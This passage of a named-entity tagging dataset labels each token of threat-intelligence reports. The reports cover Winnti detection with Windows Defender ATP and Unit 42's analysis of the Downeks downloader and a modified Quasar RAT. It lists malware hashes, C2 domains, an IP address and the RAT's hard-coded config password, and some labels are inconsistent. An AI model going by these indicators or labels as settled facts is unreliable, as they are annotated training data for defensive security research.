+malicious O
+one O
+, O
+filtering O
+out O
+the O
+malicious O
+file O
+would O
+involve O
+going O
+through O
+a O
+data O
+set O
+with O
+noise O
+from O
+millions O
+of O
+possible O
+file O
+names O
+, O
+software O
+publishers O
+, O
+and O
+certificates O
+. O
+
+Microsoft S-IDTY
+researchers O
+used O
+a O
+combination O
+of O
+anomaly B-TOOL
+detection E-TOOL
+and O
+supervised B-TOOL
+machine I-TOOL
+learning E-TOOL
+to O
+reduce O
+the O
+data O
+set O
+and O
+separate O
+meaningful O
+, O
+malware-related O
+anomalies O
+from O
+benign O
+data O
+. O
+
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+helps O
+network O
+security O
+professionals O
+deal O
+with O
+intrusions O
+from O
+activity O
+groups O
+like O
+LEAD S-APT
+and O
+BARIUM S-APT
+in O
+several O
+ways O
+. O
+
+The O
+following O
+examples O
+were O
+developed O
+using O
+a O
+Winnti S-MAL
+installer O
+that O
+was O
+used O
+in O
+attacks O
+in O
+December B-TIME
+2016 E-TIME
+. O
+
+Microsoft B-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+continually O
+tracks O
+activity O
+groups O
+such O
+as O
+LEAD S-APT
+and O
+BARIUM S-APT
+and O
+documents O
+the O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+they O
+employ O
+in O
+their O
+attacks O
+, O
+with O
+a O
+special O
+focus O
+on O
+the O
+tools O
+and O
+infrastructure O
+they O
+use O
+to O
+facilitate O
+those O
+attacks O
+. O
+
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+continuously O
+monitors O
+protected O
+systems O
+for O
+such O
+indicators O
+of O
+hostile O
+activity O
+and O
+alerts O
+security B-TOOL
+operations I-TOOL
+center E-TOOL
+( O
+SOC S-TOOL
+) O
+personnel O
+to O
+their O
+presence O
+. O
+
+To O
+provide O
+context O
+around O
+such O
+alerts O
+, O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+also O
+features O
+a O
+short O
+summary O
+of O
+the O
+group O
+’s O
+history O
+, O
+goals O
+, O
+methods O
+, O
+and O
+tools O
+, O
+with O
+links O
+to O
+extensive O
+documentation O
+for O
+technically O
+minded O
+users O
+. O
+
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+is O
+also O
+capable O
+of O
+detecting O
+previously O
+unknown O
+attacks O
+by O
+monitoring O
+system O
+behavior O
+indicative O
+of O
+hostile O
+activity O
+, O
+including O
+: O
+
+Malware O
+installation O
+, O
+persistence O
+, O
+and O
+activation O
+. O
+
+Backdoor O
+command O
+and O
+control O
+. O
+
+Credential O
+theft O
+. O
+
+Lateral O
+movement O
+to O
+other O
+machines O
+on O
+the O
+network O
+. O
+
+For O
+example O
+, O
+numerous O
+malware O
+families O
+register O
+themselves O
+as O
+services O
+during O
+installation O
+to O
+guarantee O
+persistence O
+across O
+reboots O
+. O
+
+A O
+majority O
+of O
+malware O
+that O
+perform O
+this O
+persistence O
+technique O
+modify O
+the O
+necessary O
+registry O
+keys O
+in O
+ways O
+that O
+do O
+not O
+fit O
+the O
+profile O
+of O
+a O
+legitimate O
+program O
+. O
+
+Winnti S-MAL
+is O
+no O
+exception O
+, O
+and O
+so O
+, O
+during O
+Winnti S-MAL
+’s O
+installation O
+process O
+, O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+is O
+able O
+to O
+raise O
+behavioral O
+alerts O
+. O
+
+To O
+improve O
+coverage O
+while O
+minimizing O
+false O
+positives O
+, O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+uses O
+the O
+intelligent O
+security O
+graph O
+to O
+differentiate O
+between O
+suspicious O
+and O
+benign O
+behavior O
+before O
+generating O
+alerts O
+. O
+
+It O
+considers O
+the O
+age O
+of O
+the O
+file O
+, O
+its O
+global O
+prevalence O
+, O
+and O
+the O
+presence O
+and O
+validity O
+of O
+a O
+digital O
+signature O
+along O
+with O
+the O
+method O
+of O
+service O
+creation O
+. O
+
+For O
+alerts O
+raised O
+either O
+by O
+specific O
+threat O
+intelligence O
+tied O
+to O
+activity O
+groups O
+or O
+by O
+more O
+generic O
+suspicious O
+behaviors O
+, O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+provides O
+rich O
+, O
+visualized O
+technical O
+context O
+. O
+
+This O
+visual O
+context O
+enables O
+SOC O
+personnel O
+to O
+investigate O
+alerts O
+with O
+all O
+related O
+artifacts O
+, O
+understand O
+the O
+scope O
+of O
+the O
+breach O
+, O
+and O
+prepare O
+a O
+comprehensive O
+action O
+plan O
+. O
+
+In O
+the O
+screenshots O
+below O
+, O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+clearly O
+presents O
+the O
+Winnti B-ACT
+installation E-ACT
+where O
+an O
+installer O
+drops O
+a O
+DLL S-TOOL
+to O
+disk O
+, O
+loads O
+the O
+DLL S-TOOL
+using O
+rundll32 O
+, O
+sets O
+the O
+DLL S-TOOL
+as O
+a O
+service O
+, O
+and O
+saves O
+a O
+copy O
+of O
+itself O
+in O
+C:\Windows\Help O
+. O
+
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+displays O
+these O
+activities O
+as O
+process O
+trees O
+in O
+a O
+machine O
+timeline O
+for O
+the O
+infected O
+computer O
+. O
+
+Analysts O
+can O
+easily O
+extract O
+detailed O
+information O
+from O
+these O
+trees O
+, O
+such O
+as O
+the O
+implant O
+DLL S-TOOL
+dropped O
+by O
+the O
+installer O
+, O
+the O
+command O
+used O
+to O
+call O
+rundll32.exe S-FILE
+and O
+load O
+the O
+DLL S-TOOL
+, O
+and O
+the O
+registry O
+modifications O
+that O
+set O
+the O
+DLL S-TOOL
+as O
+a O
+service O
+. O
+
+This O
+information O
+can O
+provide O
+an O
+initial O
+means O
+by O
+which O
+to O
+assess O
+the O
+scope O
+of O
+the O
+breach O
+. O
+
+The B-OS
+Windows I-OS
+10 I-OS
+Creators I-OS
+Update E-OS
+will O
+bring O
+several O
+enhancements O
+to O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+that O
+will O
+provide O
+SOC O
+personnel O
+with O
+options O
+for O
+immediate O
+mitigation O
+of O
+a O
+detected O
+threat O
+. O
+
+If O
+an O
+intruder O
+compromises O
+a O
+computer O
+that O
+has O
+been O
+onboarded O
+to O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+, O
+SOC O
+personnel O
+can O
+isolate O
+the O
+computer O
+from O
+the O
+network O
+, O
+blocking O
+command O
+and O
+control O
+of O
+the O
+implant O
+and O
+preventing O
+attackers O
+from O
+installing O
+additional O
+malware O
+and O
+moving O
+laterally O
+to O
+other O
+computers O
+in O
+the O
+network O
+. O
+
+Meanwhile O
+, O
+connectivity O
+to O
+the O
+Windows S-OS
+Defender O
+ATP O
+service O
+is O
+maintained O
+. O
+
+While O
+the O
+machine O
+is O
+in O
+isolation O
+, O
+SOC O
+personnel O
+can O
+direct O
+the O
+infected O
+machine O
+to O
+collect O
+live O
+investigation O
+data O
+, O
+such O
+as O
+the O
+DNS S-PROT
+cache O
+or O
+security O
+event O
+logs O
+, O
+which O
+they O
+can O
+use O
+to O
+verify O
+alerts O
+, O
+assess O
+the O
+state O
+of O
+the O
+intrusion O
+, O
+and O
+support O
+follow-up O
+actions O
+. O
+
+Another O
+option O
+is O
+to O
+simply O
+halt O
+and O
+quarantine O
+the O
+Winnti B-MAL
+implant E-MAL
+itself O
+, O
+stopping O
+the O
+intrusion O
+on O
+a O
+single O
+machine O
+. O
+
+LEAD S-APT
+and O
+BARIUM S-APT
+are O
+not O
+known O
+for O
+large-scale B-ACT
+spear-phishing E-ACT
+, O
+so O
+it O
+is O
+unlikely O
+that O
+SOC O
+personnel O
+would O
+have O
+to O
+deal O
+with O
+multiple O
+machines O
+having O
+been O
+compromised O
+by O
+these O
+groups O
+at O
+the O
+same O
+time O
+. O
+
+Nevertheless O
+, O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+also O
+supports O
+blocking O
+the O
+implant O
+across O
+the O
+entire O
+enterprise O
+, O
+stopping O
+large-scale O
+intrusions O
+in O
+the O
+early O
+stages O
+. O
+
+With O
+the O
+enhanced B-TOOL
+post-breach I-TOOL
+detection I-TOOL
+capabilities E-TOOL
+of O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+, O
+SOC O
+personnel O
+are O
+able O
+to O
+reduce O
+this O
+period O
+to O
+hours O
+or O
+even O
+minutes O
+, O
+significantly O
+lessening O
+the O
+potential O
+impact O
+of O
+persistent O
+attacker O
+access O
+to O
+their O
+network O
+. O
+
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+provides O
+extensive O
+information O
+about O
+activity O
+groups O
+responsible O
+for O
+the O
+attacks O
+, O
+enabling O
+customers O
+to O
+understand O
+aspects O
+of O
+the O
+attack O
+that O
+may O
+not O
+be O
+obtained O
+by O
+network O
+and O
+endpoint O
+sensors O
+, O
+such O
+as O
+common O
+social O
+engineering O
+lures O
+and O
+the O
+regional O
+nature O
+of O
+an O
+attack O
+. O
+
+With O
+relevant B-TOOL
+visualized I-TOOL
+information E-TOOL
+, O
+analysts O
+are O
+able O
+to O
+study O
+malware O
+behavior O
+on O
+impacted O
+machines O
+, O
+so O
+they O
+can O
+investigate O
+further O
+and O
+plan O
+out O
+their O
+response O
+. O
+
+Detecting O
+threat O
+actors O
+in O
+recent O
+German S-LOC
+industrial O
+attacks O
+with O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+. O
+
+Detecting O
+threat O
+actors O
+in O
+recent O
+German S-LOC
+industrial O
+attacks O
+with O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+. O
+
+Downeks S-MAL
+and O
+Quasar B-MAL
+RAT E-MAL
+Used O
+in O
+Recent O
+Targeted O
+Attacks O
+Against O
+Governments O
+. O
+
+Palo B-IDTY
+Alto I-IDTY
+Networks I-IDTY
+Traps I-IDTY
+Advanced I-IDTY
+Endpoint I-IDTY
+Protection E-IDTY
+recently O
+prevented O
+recent O
+attacks O
+that O
+we O
+believe O
+are O
+part O
+of O
+a O
+campaign O
+linked O
+to O
+DustySky S-ACT
+. O
+
+DustySky S-ACT
+is O
+a O
+campaign O
+which O
+others O
+have O
+attributed O
+to O
+the O
+Gaza B-APT
+Cybergang I-APT
+group E-APT
+, O
+a O
+group O
+that O
+targets O
+government O
+interests O
+in O
+the O
+region O
+. O
+
+This O
+report O
+shares O
+our O
+researchers O
+’ O
+analysis O
+of O
+the O
+attack O
+and O
+Remote B-TOOL
+Access I-TOOL
+Tool E-TOOL
+( O
+RAT E-TOOL
+) O
+. O
+
+We O
+also O
+discovered O
+during O
+our O
+research O
+that O
+the O
+RAT S-TOOL
+Server O
+used O
+by O
+this O
+attacker O
+is O
+itself O
+vulnerable O
+to O
+remote O
+attack O
+, O
+a O
+double-edged O
+sword O
+for O
+these O
+attackers O
+. O
+
+The O
+initial O
+infection O
+vector O
+in O
+this O
+attack O
+is O
+not O
+clear O
+, O
+but O
+it O
+results O
+in O
+installing O
+the O
+“ O
+Downeks S-MAL
+” O
+downloader O
+, O
+which O
+in O
+turn O
+infects O
+the O
+victim O
+computer O
+with O
+the O
+“ O
+Quasar S-MAL
+” O
+RAT S-TOOL
+. O
+
+Downeks S-MAL
+uses O
+third B-TOOL
+party I-TOOL
+websites E-TOOL
+to O
+determine O
+the O
+external O
+IP O
+of O
+the O
+victim O
+machine O
+, O
+possibly O
+to O
+determine O
+victim O
+location O
+with O
+GeoIP S-TOOL
+. O
+
+It O
+also O
+drops O
+decoy O
+documents O
+in O
+an O
+attempt O
+to O
+camouflage O
+the O
+attack O
+. O
+
+Quasar S-MAL
+is O
+a O
+.NET S-TOOL
+Framework-based O
+open-source O
+RAT S-TOOL
+. O
+
+The O
+attackers O
+invested O
+significant O
+effort O
+in O
+attempting O
+to O
+hide O
+the O
+tool O
+by O
+changing O
+the O
+source O
+code O
+of O
+the O
+RAT S-TOOL
+and O
+the O
+RAT S-TOOL
+server O
+, O
+and O
+by O
+using O
+an O
+obfuscator O
+and O
+packer O
+. O
+
+Unit O
+42 O
+researchers O
+observed O
+the O
+Quasar B-TOOL
+RA E-TOOL
+being O
+prevented O
+from O
+executing O
+on O
+a O
+Traps-protected O
+client O
+in O
+September B-TIME
+2016 E-TIME
+. O
+
+We O
+observed O
+these O
+Quasar S-MAL
+samples O
+: O
+
+f-secure.exe S-FILE
+: O
+99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f S-SHA2
+connects O
+to O
+hnoor.newphoneapp.com S-DOM
+. O
+
+HD_Audio.exe S-FILE
+: O
+0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a S-SHA2
+connects O
+to O
+manual.newphoneapp.com S-DOM
+. O
+
+HD_Audio.exe S-FILE
+: O
+86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 S-SHA2
+crashes O
+upon O
+execution O
+. O
+sim.exe S-FILE
+723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42 S-SHA2
+connects O
+to O
+hnoor.newphoneapp.com S-DOM
+. O
+
+Further O
+research O
+found O
+other O
+Quasar S-MAL
+examples O
+, O
+an O
+attack S-ACT
+earlier O
+in O
+the O
+month O
+2016 S-TIME
+on O
+the O
+same O
+target O
+: O
+
+SHA256 S-ENCR
+: O
+1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f S-SHA2
+. O
+
+We O
+found O
+the O
+same O
+Quasar S-MAL
+code O
+in O
+an O
+additional O
+attack O
+on O
+the O
+same O
+day O
+, O
+but O
+upon O
+a O
+different O
+target O
+. O
+
+A O
+second O
+Quasar S-MAL
+sample O
+was O
+also O
+observed O
+attacking O
+this O
+new O
+victim O
+: O
+
+SHA256 S-ENCR
+: O
+99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f S-SHA2
+. O
+
+We O
+do O
+not O
+have O
+detailed O
+visibility O
+into O
+the O
+specific O
+host O
+attacked O
+, O
+and O
+have O
+not O
+been O
+able O
+to O
+reproduce O
+the O
+second O
+stage O
+of O
+the O
+attack O
+in O
+our O
+lab O
+. O
+
+However O
+, O
+based O
+upon O
+the O
+timeframe O
+of O
+subsequent O
+telemetry O
+we O
+observe O
+, O
+we O
+understand O
+the O
+attack B-ACT
+chain E-ACT
+as O
+follows O
+: O
+
+The O
+initial O
+dropper O
+( O
+which O
+varies O
+across O
+attacks O
+) O
+is O
+delivered O
+to O
+the O
+victim O
+via O
+email S-TOOL
+or O
+web O
+: O
+
+File O
+Name O
+: O
+Joint B-FILE
+Ministerial I-FILE
+Council I-FILE
+between I-FILE
+the I-FILE
+GCC I-FILE
+and I-FILE
+the I-FILE
+EU I-FILE
+Council.exe E-FILE
+” O
+. O
+
+SHA256 S-ENCR
+0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa S-SHA2
+. O
+
+The O
+initial O
+dropper O
+, O
+upon O
+execution O
+, O
+extracts O
+an O
+embedded O
+Downeks S-MAL
+instance O
+: O
+
+File O
+Name O
+: O
+ati.exe S-FILE
+. O
+
+SHA256 S-ENCR
+f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec S-SHA2
+. O
+
+Downeks S-MAL
+makes O
+a O
+POST O
+request O
+to O
+dw.downloadtesting.com S-DOM
+, O
+resulting O
+in O
+the O
+installation O
+of O
+the O
+Quasar S-MAL
+RAT S-TOOL
+on O
+the O
+victim O
+machine O
+. O
+
+Additional O
+Downeks S-MAL
+downloaders O
+connecting O
+to O
+the O
+previously-observed B-TOOL
+server E-TOOL
+dw.downloadtesting.com S-DOM
+were O
+also O
+found O
+in O
+this O
+attack O
+: O
+
+SHA256 S-ENCR
+15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a S-SHA2
+. O
+
+SHA256 S-ENCR
+9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740 S-SHA2
+. O
+
+Further O
+research O
+identified O
+dozens O
+of O
+Dowenks S-MAL
+and O
+Quasar S-MAL
+samples O
+related O
+to O
+these O
+attackers O
+. O
+
+All O
+included O
+decoy B-TOOL
+document E-TOOL
+written O
+in O
+Arabic O
+( O
+all O
+related O
+to O
+Middle B-LOC
+Eastern E-LOC
+politics O
+) O
+or O
+Hebrew O
+. O
+
+Most O
+of O
+them O
+use O
+the O
+same O
+mutex S-TOOL
+structure O
+, O
+share O
+the O
+same O
+fake O
+icon O
+and O
+unique O
+metadata O
+details O
+, O
+file O
+writes O
+, O
+registry O
+operations O
+, O
+and O
+fake O
+common O
+program O
+metadata O
+, O
+as O
+seen O
+in O
+DustySky S-ACT
+samples O
+. O
+
+The O
+Downeks S-MAL
+downloader O
+and O
+Quasar S-MAL
+C2 S-TOOL
+infrastructures O
+are O
+each O
+self-contained O
+and O
+independent O
+of O
+each O
+other O
+. O
+
+However O
+, O
+we O
+did O
+find O
+a O
+single O
+shared O
+IP S-PROT
+address O
+demonstrably O
+connecting O
+the O
+Downeks S-MAL
+downloader O
+and O
+Quasar S-MAL
+C2 S-TOOL
+infrastructure O
+. O
+
+We O
+saw O
+five O
+samples O
+built O
+on O
+the O
+same O
+date O
+in O
+December B-TIME
+2015 E-TIME
+, O
+and O
+six O
+on O
+the O
+same O
+date O
+in O
+January S-TIME
+, O
+further O
+solidifying O
+the O
+link O
+between O
+each O
+sample O
+. O
+
+We O
+analyzed O
+a O
+Quasar S-MAL
+sample O
+we O
+found O
+that O
+was O
+communicating O
+with O
+an O
+active O
+C2 S-TOOL
+server O
+at O
+the O
+time O
+of O
+analysis O
+: O
+
+SHA256 S-ENCR
+: O
+4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273 S-SHA2
+. O
+
+Quasar S-MAL
+is O
+a O
+publicly-available O
+commodity O
+RAT S-TOOL
+, O
+an O
+evolution O
+of O
+his O
+earlier O
+xRAT S-TOOL
+, O
+by O
+German S-LOC
+developer O
+“ O
+MaxXor O
+” O
+. O
+
+This O
+sample O
+is O
+a O
+modified O
+version O
+of O
+Quasar S-MAL
+, O
+most O
+likely O
+forked O
+from O
+open O
+source O
+version O
+1.2.0.0 O
+on O
+GitHub O
+. O
+
+The O
+client O
+was O
+likely O
+built O
+using O
+the O
+Quasar S-MAL
+server O
+client O
+builder O
+. O
+
+We O
+observed O
+the O
+following O
+customizations O
+: O
+
+C2 S-TOOL
+server O
+: O
+app.progsupdate.com S-DOM
+, O
+which O
+resolved O
+to O
+185.141.25.68 S-IP
+) O
+, O
+over O
+port O
+4664 O
+. O
+
+Quasar S-MAL
+mutex O
+name O
+: O
+VMFvdCsC7RFqerZinfV0sxJFo S-FILE
+. O
+
+Keylogger O
+log O
+location O
+: O
+Users\hJTQwqwwSCkZU\AppData\Roaming\GoogleDesktop\<date> O
+. O
+
+The O
+malware O
+uses O
+fake B-TOOL
+version I-TOOL
+information E-TOOL
+to O
+appear O
+as O
+a O
+Microsoft S-IDTY
+update O
+program O
+, O
+as O
+well O
+as O
+Google B-TOOL
+Desktop I-TOOL
+once I-TOOL
+unpacked E-TOOL
+. O
+
+This O
+sample O
+is O
+packed O
+by O
+“ O
+Netz S-TOOL
+” O
+, O
+a O
+simple O
+.NET S-TOOL
+Framework O
+packer O
+which O
+stores O
+the O
+original O
+executable O
+compressed O
+( O
+zlib O
+) O
+as O
+a O
+resource O
+. O
+
+At O
+runtime O
+, O
+the O
+packer O
+decompresses O
+the O
+resource O
+and O
+uses O
+Reflection O
+to O
+load O
+the O
+assembly O
+, O
+find O
+its O
+Entry O
+point O
+, O
+and O
+Invoke O
+it O
+. O
+
+Extracting O
+the O
+payload O
+is O
+straight O
+forward O
+– O
+we O
+simply O
+dump O
+the O
+resource O
+and O
+decompress O
+it O
+. O
+
+We O
+discovered O
+that O
+the B-FILE
+sample E-FILE
+was O
+obfuscated S-TOOL
+using O
+.NET B-TOOL
+reactor E-TOOL
+. O
+
+It O
+is O
+possible O
+to O
+decompile O
+the O
+deobfuscated O
+sample O
+and O
+retrieve O
+most O
+of O
+the O
+original O
+source O
+code O
+but O
+not O
+enough O
+to O
+compile O
+it O
+easily O
+. O
+
+After O
+deobfuscation S-TOOL
+we O
+extracted O
+: O
+
+SHA256 S-ENCR
+: O
+d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d S-SHA2
+. O
+
+After O
+decompiling O
+the O
+sample O
+, O
+we O
+were O
+able O
+to O
+document O
+the O
+modifications O
+from O
+the O
+open-source O
+Quasar S-MAL
+. O
+
+The O
+configuration O
+of O
+Quasar S-MAL
+is O
+stored O
+in O
+the O
+Settings O
+object O
+, O
+which O
+is O
+encrypted O
+with O
+a O
+password O
+which O
+is O
+itself O
+stored O
+unencrypted O
+. O
+
+Modifications O
+: O
+
+The O
+ISCHECKIP S-MAL
+and O
+INSTARTUPFOLDER S-MAL
+are O
+not O
+found O
+in O
+open O
+source O
+Quasar S-MAL
+samples O
+. O
+
+The O
+sample O
+we O
+analyzed O
+is O
+using O
+RijndaelManaged S-ENCR
+with O
+ECB B-ENCR
+mode E-ENCR
+and O
+PKCS7 B-ENCR
+padding E-ENCR
+. O
+
+The O
+key O
+is O
+the O
+SHA256 S-ENCR
+hash O
+of O
+the O
+hard-coded O
+password O
+. O
+
+The O
+password O
+of O
+the O
+sample O
+we O
+analyzed O
+is O
+: O
+“ O
+6y7u^Y&U6y7u^Y&U6y7u^Y&U O
+” O
+. O
+
+Although O
+at O
+first O
+glance O
+this O
+appears O
+somewhat O
+complex O
+, O
+it O
+is O
+in O
+fact O
+a O
+rather O
+simple O
+, O
+repeated O
+keyboard O
+sequence O
+. O
+
+We O
+observe O
+similar O
+keyboard O
+patterns O
+in O
+other O
+samples O
+: O
+“ O
+567%^& O
+” O
+, O
+“ O
+zxc!@#ASD O
+” O
+. O
+
+Modifications O
+: O
+
+Uses O
+SHA256 S-ENCR
+instead O
+of O
+MD5 S-ENCR
+to O
+create O
+the O
+key O
+. O